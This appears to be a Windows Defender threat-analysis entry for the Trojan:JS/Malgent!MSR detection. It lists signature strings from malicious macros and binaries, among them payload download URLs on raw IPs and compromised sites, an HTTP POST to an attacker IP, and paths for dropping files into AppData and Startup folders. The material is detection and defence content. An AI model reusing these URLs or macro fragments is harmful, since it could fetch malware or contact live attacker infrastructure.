Trojan:JS/Malgent!MSR - Windows Defender Threat Analysis

This is a JavaScript-based Trojan (Malgent family) that, often delivered via macros or social engineering, downloads and executes secondary malicious payloads from remote servers. It employs obfuscation, drops executables in user directories like Desktop and AppData, and establishes persistence on the compromised system.

Relevant strings associated with this threat:
 -  = Environ("USERPROFILE") & "\Desktop" & "\quotation.exe" (MACROHSTR_EXT)
 - http://45.78.21.150/boost/boosting.exe (MACROHSTR_EXT)
 - = Replace("ht##tp##:##/##/ (MACROHSTR_EXT)
 -  = (Err.Number = 0) (MACROHSTR_EXT)
 -  = (Environ("temp") & "\" &  (MACROHSTR_EXT)
 - path_file = Environ$("USERPROFILE") + "\AppData\Roaming\" + "\" + path_dom + a + b + c (MACROHSTR_EXT)
 - path_file = Environ$("USERPROFILE") & "\AppData\" + path_dom + ".ttp" (MACROHSTR_EXT)
 - Variable2.savetofile "234.e" & "xe", 2 (MACROHSTR_EXT)
 - ExecuteExcel4Macro Replace(UserForm1. (MACROHSTR_EXT)
 - 2C:\Codes\Version2\pe_encrypt\Release\PECloner.pdb (PEHSTR)
 - TmDbgLog.dll (PEHSTR_EXT)
 - ssMUIDLL.dll (PEHSTR_EXT)
 - arguments="https://d3727mhevtk2n4.cloudfront.net/srv-stg-agent (MACROHSTR_EXT)
 - Call trenes("http://kuzov-remont.com/wp-admin/js/win.exe", (MACROHSTR_EXT)
 - Environ("AppData") & "\Ds.exe") (MACROHSTR_EXT)
 - Environ("Userprofile") & "\Men (MACROHSTR_EXT)
 -  Inicio\Programas\Inicio\Ds.exe") (MACROHSTR_EXT)
 - Global\gfxQJsVUhkMOSadImwZFBbnpe2Gjv7HA (PEHSTR_EXT)
 - explorer.exe (PEHSTR_EXT)
 - svchost.exe (PEHSTR_EXT)
 - del "C:\Documents and Settings\All Usersd (PEHSTR_EXT)
 - .dll (PEHSTR_EXT)
 - DllRegisterServer (PEHSTR_EXT)
 - CymulateScreenShotTrojan.pdb (PEHSTR_EXT)
 - i.ibb.co/q1B4wyW/nature-field-gra-130247647 (PEHSTR_EXT)
 - sdsdsdsds.pdb (PEHSTR_EXT)
 - DLL\test\Release\Dll1.pdb (PEHSTR_EXT)
 - "C:\Windows\iexplore.exe" (PEHSTR_EXT)
 - \Release\mfc.pdbd (PEHSTR_EXT)
 - zh-CN/NUSData/M2052Hongyu.voiceAssistant.unt (PEHSTR_EXT)
 - zh-CN/NUSData/M2052Kangkang.keyboard.unt (PEHSTR_EXT)
 - https://www.cuochiperungiorno.it/ (PEHSTR_EXT)
 - _Setup.exe (PEHSTR_EXT)
 - https://tapestryoftruth.com/ (PEHSTR_EXT)
 - .exe (PEHSTR_EXT)
 - E:\PROJETOS2023\CSHARP\RAT\MXNOBUGMAG\Bin\Release\msedge_elf.pdb (PEHSTR_EXT)
 - E:\PROJETOS2023\CSHARP\RAT\MXNOBUGMAG\Bin\Release\VCRUNTIME140.pdb (PEHSTR_EXT)
 - AppApi.dll (PEHSTR_EXT)
 - D:\a\_work\1\s\artifacts\obj\coreclr\windows.x86.Release\Corehost.Static\singlefilehost.pdb (PEHSTR_EXT)
 - G:\repos\ApiApp\AppApi\obj\Release\net9.0\win-x86\AppApi.pdb (PEHSTR_EXT)
 - info-sec.jp/attach (PEHSTR_EXT)
 - stgsec-info.jp/acon (PEHSTR_EXT)
 - PdfAttachProduction.exe (PEHSTR_EXT)
 - cm74336.tw1.ru/calc.execalc.exesrc (PEHSTR_EXT)
 - =createobject("msxml2.xmlhttp")http_obj.open"post","http://188.130.234.189/wait.php (MACROHSTR_EXT)
 - !#HSTR:StringCodeForMshta.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.C!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.D!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.L!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.O!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForRegsvr32.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForRundll32.A!pli (PEHSTR_EXT)
 - rundll32 (PEHSTR_EXT)
 - !#HSTR:StringCodeForBITSJobs.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForPowerShell.G!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForScheduledTask.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForDataEncoding.D!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.J!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.K!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForRemoteFileCopy.B!pli (PEHSTR_EXT)
 - !#HSTR:ExecutionGuardrails (PEHSTR_EXT)
 - !#HSTR:StringCodeForFileDeletion.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.M!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForNetshHelperDLL.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForRemoteServices.A!pli (PEHSTR_EXT)

Immediately isolate the affected system, perform a comprehensive endpoint scan to eradicate all malicious files and associated persistence mechanisms, and block all network communication to identified command-and-control (C2) infrastructure and download sources.